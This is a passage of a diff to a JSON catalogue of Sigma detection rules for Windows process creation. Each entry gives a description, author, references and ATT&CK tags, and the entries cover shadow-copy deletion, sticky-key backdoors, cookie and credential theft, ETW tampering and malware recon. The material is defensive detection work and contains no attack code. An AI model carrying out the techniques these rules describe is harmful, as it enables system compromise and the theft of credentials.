avoid detection", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/01", - "falsepositive": [ - "Legitimate software deleting using the same method of deletion (Add it to a filter if you find cases as such)" - ], - "filename": "proc_creation_win_sc_delete_av_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_delete_av_services.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "7fd4bb39-12d0-45ab-bb36-cebabc73dc7b", - "value": "Suspicious Execution of Sc to Delete AV Services" - }, - { - "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", - "meta": { - "author": "frack113", - "creation_date": "2021/12/06", - "falsepositive": [ - "Legitimate query of a service by an administrator to get more information such as the state or PID" - ], - "filename": "proc_creation_win_sc_query.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1007" - ] - }, - "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", - "value": "SC.EXE Query Execution" - }, - { - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "meta": { - "author": "Markus Neis", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" - ] - }, - "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", - "value": "Possible Shim Database Persistence via sdbinst.exe" - }, - { - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/05/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "ETW Logging Tamper In .NET Processes" + }, + { + "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/06", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_sdclt_child_process.yml", + "filename": "proc_creation_win_inline_win_api_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/m417z/status/1566674631788007425", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "value": "Potential WinAPI Access Via CommandLine" + }, + { + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/23", + "falsepositive": [ + "Software installers that run from temporary folders and also install scheduled tasks" + ], + "filename": "proc_creation_win_susp_schtasks_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", - "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" + "https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "9494479d-d994-40bf-a8b1-eea890237021", + "value": "Suspicious Add Scheduled Task Parent" + }, + { + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "meta": { + "author": "Olaf Hartong", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_win10_sched_task_0day.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1053.005", + "car.2013-08-001" ] }, - "uuid": "da2738f2-fadb-4394-afa7-0a0674885afa", - "value": "Sdclt Child Processes" + "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" }, { - "description": "Detects the use of SDelete to erase a file not the free space", + "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", "meta": { - "author": "frack113", - "creation_date": "2021/06/03", + "author": "David Burkett, Florian Roth", + "creation_date": "2019/12/28", "falsepositive": [ - "System administrator usage" + "Rare System Admin Activity" ], - "filename": "proc_creation_win_sdelete.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "a4824fca-976f-4964-b334-0621379e84c4", - "value": "Sysinternals SDelete Delete File" - }, - { - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "meta": { - "author": "Nextron Systems", - "creation_date": "2022/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ] - }, - "uuid": "f3d39c45-de1a-4486-a687-ab126124f744", - "value": "Sdiagnhost Calling Suspicious Child Process" - }, - { - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/23", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_selectmyparent.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", - "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", - "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1134.004" - ] - }, - "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", - "value": "PPID Spoofing Tool Usage" - }, - { - "description": "Detects manual service execution (start) via system utilities.", - "meta": { - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user executes a service for legitimate reasons." - ], - "filename": "proc_creation_win_service_execution.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", - "value": "Service Execution" - }, - { - "description": "Detects a windows service to be stopped", - "meta": { - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/10/23", - "falsepositive": [ - "Administrator shutting down the service due to upgrade or removal purposes" - ], - "filename": "proc_creation_win_service_stop.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_stop.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "eb87818d-db5d-49cc-a987-d5da331fbd90", - "value": "Stop Windows Service" - }, - { - "description": "Detects use of executionpolicy option to set insecure policies", - "meta": { - "author": "frack113", - "creation_date": "2021/11/01", - "falsepositive": [ - "Administrator script" - ], - "filename": "proc_creation_win_set_policies_to_unsecure_level.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", - "value": "Change PowerShell Policies to an Insecure Level" - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" - }, - { - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "meta": { - "author": "Teymur Kheirkhabarov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "filename": "proc_creation_win_shadow_copies_access_symlink.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_access_symlink.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "value": "Shadow Copies Access via Symlink" - }, - { - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "meta": { - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate administrator working with shadow copies, access for backup purposes" - ], - "filename": "proc_creation_win_shadow_copies_creation.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" - ] - }, - "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "value": "Shadow Copies Creation Using Operating Systems Utilities" - }, - { - "description": "Shadow Copies deletion using operating systems utilities", - "meta": { - "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", - "creation_date": "2019/10/22", - "falsepositive": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", - "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" - ], - "filename": "proc_creation_win_shadow_copies_deletion.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://blog.talosintelligence.com/2017/05/wannacry.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/Neo23x0/Raccine#the-process", - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070", - "attack.t1490" - ] - }, - "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "value": "Shadow Copies Deletion Using Operating Systems Utilities" - }, - { - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sharpup.yml", + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/SharpUp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharpup.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" - ] - }, - "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "value": "SharpUp PrivEsc Tool" - }, - { - "description": "Detects usage of the Sharp Chisel via the commandline arguments", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/05", - "falsepositive": [ - "Some false positives may occure with other tools with similar commandlines" - ], - "filename": "proc_creation_win_sharp_chisel_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/shantanu561993/SharpChisel", - "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ] - }, - "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "value": "SharpChisel Usage" - }, - { - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", - "creation_date": "2021/12/17", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "filename": "proc_creation_win_shell_spawn_by_java.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "value": "Shells Spawned by Java" - }, - { - "description": "Detects a suspicious child process of a Windows shell", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2018/04/06", - "falsepositive": [ - "Administrative scripts", - "Microsoft SCCM" - ], - "filename": "proc_creation_win_shell_spawn_susp_program.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "value": "Windows Shell Spawning Suspicious Program" - }, - { - "description": "Detects SILENTTRINITY stager use", - "meta": { - "author": "Aleksey Potapov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_silenttrinity_stage_use.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", - "value": "SILENTTRINITY Stager Execution" - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_win_software_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" ], "tags": [ "attack.discovery", - "attack.t1518" + "attack.t1482" ] }, - "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", - "value": "Detected Windows Software Discovery" + "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", + "value": "Trickbot Malware Recon Activity" }, { - "description": "Detect attacker collecting audio via SoundRecorder application.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate audio capture by legitimate user." - ], - "filename": "proc_creation_win_soundrec_audio_capture.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", - "value": "Audio Capture via SoundRecorder" - }, - { - "description": "Detects Service Principal Name Enumeration used for Kerberoasting", - "meta": { - "author": "Markus Neis, keepwatch", - "creation_date": "2018/11/14", - "falsepositive": [ - "Administrator Activity" - ], - "filename": "proc_creation_win_spn_enum.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "value": "Possible SPN Enumeration" - }, - { - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", - "creation_date": "2021/12/20", + "creation_date": "2022/12/23", "falsepositive": [ - "Unknown" + "Legitimate administrative script" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "filename": "proc_creation_win_frombase64string_archive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frombase64string_archive.yml" + ], + "tags": "No established tags" + }, + "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation" + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_runx_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.d7xtech.com/free-software/runx/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" ], "tags": [ - "attack.collection", - "attack.t1005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ] }, - "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "value": "VeeamBackup Database Credentials Dump" + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System" }, { - "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", "meta": { - "author": "frack113", - "creation_date": "2022/04/08", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "creation_date": "2020/10/14", "falsepositive": [ - "Unknown" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "filename": "proc_creation_win_sqlite_firefox_cookies.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1539" - ] - }, - "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", - "value": "SQLite Firefox Cookie DB Access" - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "meta": { - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/03/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_stickykey_like_backdoor.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ] - }, - "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "value": "Sticky Key Like Backdoor Usage" - }, - { - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/02/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" - ], - "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" - ] - }, - "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "value": "Sticky-Key Backdoor Copy Cmd.exe" - }, - { - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "meta": { - "author": "Austin Songer (@austinsonger)", - "creation_date": "2021/10/21", - "falsepositive": [ - "Legitimate usage of stordiag.exe." - ], - "filename": "proc_creation_win_stordiag_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", - "https://twitter.com/eral4m/status/1451112385041911809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "value": "Execution via stordiag.exe" - }, - { - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "meta": { - "author": "frack113", - "creation_date": "2022/07/16", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_susp_16bit_application.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - 